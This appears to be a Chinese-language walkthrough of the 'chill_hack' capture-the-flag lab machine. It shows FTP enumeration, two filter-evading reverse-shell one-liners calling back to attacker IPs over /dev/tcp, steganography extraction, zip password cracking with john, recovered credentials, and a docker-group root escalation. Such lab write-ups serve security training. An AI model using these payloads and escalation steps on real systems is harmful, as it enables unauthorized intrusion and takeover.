chill_hack靶机攻略

chill_hack靶机攻略

扫描

chill_hack靶机攻略_第1张图片

chill_hack靶机攻略_第2张图片

渗透

ftp开放,提示ftp连接

连接过后发现一个文本文件

下载下来

ftp 10.4.7.155
ftp
ftp
dir
get note.txt

chill_hack靶机攻略_第3张图片

查看内容

image-20231030210456604

此处可以知道两个用户名,并且提示命令被过滤

bash${IFS}-c${IFS}'bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.4.7.132/8888 0>&1'
bash${IFS}-c${IFS}'bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.4.7.138/12138 0>&1'

提权

使用sudo -l

发现可以以appar身份执行.sh文件

chill_hack靶机攻略_第4张图片

chill_hack靶机攻略_第5张图片

看代码感觉没什么用

在/var/www/files中发现hacker.php

查看源码

两行提示可能有图片隐写

chill_hack靶机攻略_第6张图片

靶机开启pythonweb服务

image-20231030215822449

使用工具

steghide extract -sf hacker-with-laptop_23-2147985341.jpg

发现有个压缩包,但是解压需要密码

zip2john backup.zip > backup.john
# 将名为 backup.zip 的 ZIP 文件的密码哈希提取出来,并将结果保存到名为 backup.john 的文件中
john --wordlist=/usr/share/wordlists/rockyou.txt backup.john 

chill_hack靶机攻略_第7张图片

pass1word

chill_hack靶机攻略_第8张图片

查看一下解压出来的东西

发现密文

chill_hack靶机攻略_第9张图片

IWQwbnRLbjB3bVlwQHNzdzByZA==
#base64解码
!d0ntKn0wmYp@ssw0rd

家目录下可以看到有三个用户,挨个尝试ssh登录,发现只有anurodh可以登录

anurodh:!d0ntKn0wmYp@ssw0rd

chill_hack靶机攻略_第10张图片

id发现该用户在docker组内

怀疑在docker里

查看该文件,确认一下是不是在docker里

chill_hack靶机攻略_第11张图片

发现就是在docker里

查看docker镜像

docker images

提权

docker run -it -v /root:/mnt alpine

image-20231030223032891

你可能感兴趣的:(靶机系列,java,数据库,开发语言,网络安全,安全,web安全)